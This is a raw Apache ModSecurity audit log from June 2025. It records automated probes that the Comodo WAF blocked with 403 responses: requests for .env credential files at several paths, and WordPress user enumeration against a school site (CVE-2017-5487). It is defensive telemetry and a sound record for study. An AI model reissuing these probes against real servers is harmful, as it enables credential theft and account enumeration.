Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c85cbb5c-Z-- --c063f551-A-- [09/Jun/2025:07:30:31 +0700] aEYrJ02r5gN9oSasJQwHtAAAANg 103.236.140.4 36784 103.236.140.4 8181 --c063f551-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 20.253.155.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 20.253.155.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c063f551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c063f551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749429031598097 3217 (- - -) Stopwatch2: 1749429031598097 3217; combined=1520, p1=549, p2=935, p3=0, p4=0, p5=36, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c063f551-Z-- --145fad49-A-- [09/Jun/2025:07:33:51 +0700] aEYr702r5gN9oSasJQwKyAAAANc 103.236.140.4 47320 103.236.140.4 8181 --145fad49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --145fad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --145fad49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749429231968633 839 (- - -) Stopwatch2: 1749429231968633 839; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --145fad49-Z-- --fd67c263-A-- [09/Jun/2025:07:34:01 +0700] aEYr-a6OGK25CtJ36rNUjwAAAAw 103.236.140.4 47824 103.236.140.4 8181 --fd67c263-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --fd67c263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd67c263-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749429241911117 925 (- - -) Stopwatch2: 1749429241911117 925; combined=443, p1=400, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd67c263-Z-- --9c1f0011-A-- [09/Jun/2025:07:49:12 +0700] aEYviBMDIkuu7kMwm-BuFQAAAIY 103.236.140.4 37574 103.236.140.4 8181 --9c1f0011-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.242.234.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.242.234.46 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --9c1f0011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c1f0011-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749430152752462 3206 (- - -) Stopwatch2: 1749430152752462 3206; combined=1416, p1=504, p2=881, p3=0, p4=0, p5=31, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c1f0011-Z-- --489f7d65-A-- [09/Jun/2025:08:08:45 +0700] aEY0HRMDIkuu7kMwm-B-AwAAAIE 103.236.140.4 39738 103.236.140.4 8181 --489f7d65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.254.186.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.254.186.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --489f7d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --489f7d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749431325698554 2924 (- - -) Stopwatch2: 1749431325698554 2924; combined=1353, p1=457, p2=862, p3=0, p4=0, p5=34, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --489f7d65-Z-- --cd780074-A-- [09/Jun/2025:08:23:00 +0700] aEY3dGIgvuFVSPOFHr-L_AAAAE0 103.236.140.4 55554 103.236.140.4 8181 --cd780074-B-- GET /protected/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --cd780074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd780074-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749432180067847 857 (- - -) Stopwatch2: 1749432180067847 857; combined=309, p1=269, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd780074-Z-- --0961fd02-A-- [09/Jun/2025:08:32:06 +0700] aEY5lmIgvuFVSPOFHr-ShwAAAEU 103.236.140.4 55432 103.236.140.4 8181 --0961fd02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.239.116.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.239.116.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0961fd02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0961fd02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749432726130522 3282 (- - -) Stopwatch2: 1749432726130522 3282; combined=1335, p1=478, p2=817, p3=0, p4=0, p5=39, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0961fd02-Z-- --ea524f6d-A-- [09/Jun/2025:08:41:06 +0700] aEY7sq6OGK25CtJ36rOLOQAAAAY 103.236.140.4 54830 103.236.140.4 8181 --ea524f6d-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Accept-Charset: utf-8 --ea524f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea524f6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749433266353589 805 (- - -) Stopwatch2: 1749433266353589 805; combined=362, p1=318, p2=0, p3=0, p4=0, p5=44, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea524f6d-Z-- --1556c52e-A-- [09/Jun/2025:09:07:45 +0700] aEZB8a6OGK25CtJ36rOiJAAAAAU 103.236.140.4 50830 103.236.140.4 8181 --1556c52e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.231.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.231.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1556c52e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1556c52e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749434865709276 2533 (- - -) Stopwatch2: 1749434865709276 2533; combined=1045, p1=330, p2=688, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1556c52e-Z-- --4c8a8c4d-A-- [09/Jun/2025:09:35:21 +0700] aEZIaa6OGK25CtJ36rO7dwAAAAY 103.236.140.4 51000 103.236.140.4 8181 --4c8a8c4d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4c8a8c4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8a8c4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749436521269009 565 (- - -) Stopwatch2: 1749436521269009 565; combined=253, p1=227, p2=0, p3=0, p4=0, p5=25, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8a8c4d-Z-- --115dbb69-A-- [09/Jun/2025:09:46:00 +0700] aEZK6E2r5gN9oSasJQxnVwAAAMQ 103.236.140.4 55162 103.236.140.4 8181 --115dbb69-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --115dbb69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --115dbb69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749437160030022 901 (- - -) Stopwatch2: 1749437160030022 901; combined=424, p1=385, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115dbb69-Z-- --207ad556-A-- [09/Jun/2025:09:59:13 +0700] aEZOAU2r5gN9oSasJQxxIQAAAMU 103.236.140.4 38778 103.236.140.4 8181 --207ad556-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.162.60.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.162.60.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --207ad556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --207ad556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749437953858014 2674 (- - -) Stopwatch2: 1749437953858014 2674; combined=1123, p1=390, p2=703, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --207ad556-Z-- --c34f0d33-A-- [09/Jun/2025:10:18:51 +0700] aEZSm66OGK25CtJ36rPfsQAAAAQ 103.236.140.4 42644 103.236.140.4 8181 --c34f0d33-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.128.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.128.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c34f0d33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c34f0d33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749439131740757 4060 (- - -) Stopwatch2: 1749439131740757 4060; combined=2081, p1=602, p2=1443, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c34f0d33-Z-- --48914b5c-A-- [09/Jun/2025:10:37:55 +0700] aEZXE02r5gN9oSasJQyLuAAAAMc 103.236.140.4 48750 103.236.140.4 8181 --48914b5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; CAM-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --48914b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48914b5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749440275254585 888 (- - -) Stopwatch2: 1749440275254585 888; combined=425, p1=388, p2=0, p3=0, p4=0, p5=37, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48914b5c-Z-- --18a5e917-A-- [09/Jun/2025:10:49:07 +0700] aEZZs02r5gN9oSasJQyVPgAAAM0 103.236.140.4 53862 103.236.140.4 8181 --18a5e917-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --18a5e917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a5e917-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749440947532040 937 (- - -) Stopwatch2: 1749440947532040 937; combined=432, p1=388, p2=0, p3=0, p4=0, p5=44, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a5e917-Z-- --8a4f8063-A-- [09/Jun/2025:11:00:58 +0700] aEZcek2r5gN9oSasJQydBAAAAM0 103.236.140.4 33022 103.236.140.4 8181 --8a4f8063-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --8a4f8063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a4f8063-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749441658958333 899 (- - -) Stopwatch2: 1749441658958333 899; combined=387, p1=328, p2=0, p3=0, p4=0, p5=58, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a4f8063-Z-- --b395283e-A-- [09/Jun/2025:11:07:27 +0700] aEZd_02r5gN9oSasJQyg7AAAAMs 103.236.140.4 52576 103.236.140.4 8181 --b395283e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.47.66.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.47.66.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b395283e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b395283e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749442047923152 2501 (- - -) Stopwatch2: 1749442047923152 2501; combined=1277, p1=437, p2=810, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b395283e-Z-- --1f8a9c12-A-- [09/Jun/2025:11:22:20 +0700] aEZhfGIgvuFVSPOFHr8JMAAAAFU 103.236.140.4 45718 103.236.140.4 8181 --1f8a9c12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en; rv:1.9.2.28) Gecko/20120308 Camino/2.1.2 (like Firefox/3.6.28) Accept-Charset: utf-8 --1f8a9c12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f8a9c12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749442940754733 882 (- - -) Stopwatch2: 1749442940754733 882; combined=374, p1=332, p2=0, p3=0, p4=0, p5=42, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
